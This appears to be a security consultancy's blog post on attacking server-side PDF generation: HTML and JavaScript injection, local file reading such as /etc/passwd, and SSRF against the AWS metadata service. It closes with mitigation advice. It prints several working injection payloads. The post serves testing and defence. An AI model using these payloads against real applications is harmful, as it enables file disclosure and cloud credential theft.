LATEST CYBER SECURITY NEWS AND VIEWS

Home > News > Breaking PDFs with Server-Side Shenanigans

Latest news

Breaking PDFs with Server-Side Shenanigans

Posted on

Breaking PDFs

Introduction

Generating PDFs from user supplied content is very common functionality within modern day Web Applications. Be it producing a receipt for an online purchase or generating a report based on user supplied content collected by the web application. There is endless application for this functionality.

Dynamic PDF generation holds significant potential for a wide range of applications, and as a result there are many third-party libraries (some open source) available that provide developers with the functionality of generating a dynamic PDF with user-supplied content.

The following sections will break down the potential attack surface that may be exposed once such functionality is implemented in a web application, discussing how to identify vulnerabilities, some known attacks as well as how to mitigate against this type of issue.

Background

Many third-party libraries exist to perform the task of PDF generation, many libraries available take in HTML and CSS code and use it to structure layout of the final PDF.

Popular Third-Party Libraries

  • PDFKit – JavaScript
  • iText – Java
  • Wkhtmltopdf – C++
  • FPDF – PHP
  • IronPDF – .NET

There are checks that can be performed to identify what library and sometimes what version of the library is in use. Checking the ‘Document Properties’ of a PDF will often leak the “PDF Producer” in the document meta-data.

An example below is the document properties of an invoice generated by Amazon for a recent online purchase, as seen highlighted in the figure below the “PDF Producer” has provided us what library is being used as well as the specific version of that library:

Often checking the Document Properties will provide a clear indication on if the PDF has been generated client-side or server-side. It is safe to assume that the PDF related to the screenshot above has been generated server-side using iText 2.0.8.

Basic Discovery

The first check is identifying the vulnerable input by attempting to inject some additional HTML elements into the page to understand how the application handles it. Adding in some <h1> tags before your input will suffice and will make it clear when a potentially vulnerable input has been identified.

In performing this check, the tester will be able to confirm two things:

  • The application does not correctly sanitise user-input.
  • The application does not encode “malicious” characters.

The result:

Exploit

Now we’ve confirmed its possible to add additional HTML how can this vulnerability be exploited further? How does the application handle ‘<script>’ or ‘<img>’ tags?

Attempt to use any of the following scripts to identify the presence of JavaScript, note that depending on implementation and configuration the <script> tags may be disabled. However, how about being more creative by using other HTML elements.

Basic Discovery Scripts

  • <img src=”x” onerror=”document.write(document.location.href)” />
  • <script>document.write(JSON.stringify(window.location))</script>
  • <svg/onload=document.write(document.location.href)>

The result:

Instead of the PDF generator simply rendering the code as text on the screen, it is attempting to run the script server-side allowing us to write the ‘document.location.href’ to the page.

Once you have confirmed that it is possible to inject HTML and JavaScript into the document for the server to run, what else is achievable?

Local File Inclusion

“The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a “dynamic file inclusion” mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.” – OWASP https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion

It is possible to leverage this vulnerability to include a local file on the server and render the contents of the file into the PDF document.

Consider using one of the following scripts:

The result:

In this example, specifically the contents of the /etc/passwd file is displayed, however depending on library and its implementation. It may be possible to read any file – such as SSH keys to gain unauthorised access to the system or reading configuration files for plain-text passwords to elevate privileges on the application.

Server-Side Request Forgery

“In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources. The attacker can supply or modify a URL which the code running on the server will read or submit data to, and by carefully selecting the URLs, the attacker may be able to read server configuration such as AWS metadata, connect to internal services like http enabled databases or perform post requests towards internal services which are not intended to be exposed.” – OWASP https://owasp.org/www-community/attacks/Server_Side_Request_Forgery

As we have confirmed with our previous attack that it is possible to create and send XMLHttpRequests inside <script> tags we can attempt to abuse this functionality to identify any internal services running.

If a web server is hosted within an AWS environment, then a malicious user may be able to leverage access by extracting important configurations and sometimes even authentication keys by accessing the internal REST interface located at http://169.254.169.254/latest/meta-data. By default, the AWS EC2 REST metadata service is only accessible from the specific EC2 instance its associated with and should never be exposed externally. However, with this vulnerability requests will be coming from the server and the responses are being rendered to the PDF, allowing us to access the service.

Useful AWS endpoints to query

Prevention/Conclusion

Though a very serious issue when exploited fully, the issue in most scenarios is relatively easy to fix/prevent. After walking through some basic discovery methods and some sample attacks it is possible to identify the weaknesses in the POC above.

  • Input Validation
  • Output Encoding

The application makes no effort to validate any of the input received from a user, in the scenario above it is possible to insert HTML and JavaScript code into the address field of our form. Therefore, the application is not checking if a valid address has been supplied, nor is the application validating that the input supplied is only text before sending to the web server.

Additionally, the application made no effort to encode any of the data supplied by a user. By default, PDFs render HTML entities correctly if an associated entity code is supplied, therefore an extra measure to assure that a payload will not trigger and instead be rendered as text (if a user is able to bypass the input validation) is to convert ‘dangerous’ characters to their associated HTML entity.

CharacterHTML Character Entities
&&amp;
<&lt;
>&gt;
&quot;
'

It is also often worth checking the PDF generator libraries development documentation to check if there are any additional optional security controls that could protect the application from being exploited further. Specific to the example, the application is making use of the Wkhtmltopdf library to generate PDFs, reading the developer documentation will show that the local file inclusion vulnerability could be prevented by rendering PDFs using the ‘–disable-local-file-access’ flag to prevent the tool from accessing local files.

In conclusion, there is nothing new about this vulnerability, yet it is not uncommon to find vulnerabilities of this type during a web application assessment. Though ‘simple’ to resolve this type of vulnerability is easy to overlook especially if a developer is unaware of the potential issues surrounding the functionality. The golden rule still applies that a developer should never implicitly trust user supplied content and should always check the supplied input against an approved list of whitelisted characters as to assure only text submitted to the application.

Blog post was written by Jeremy Griffin of Prism Infosec.

FILTER RESULTS

Latest tweets

Data #leakage is just one of numerous risks associated with #GenAI necessitating the use of an #AI #risk framework, as Phil Robinson explains via  @governance_and. #cybersecurity

We interview Phil Robinson, Principal Security Consultant and Founder at @prisminfosec, who shares his views on ethical hackers and the latest ransomware trends.

Sign up to our newsletter

  • Fields marked with an * are mandatory

  • This field is for validation purposes and should be left unchanged.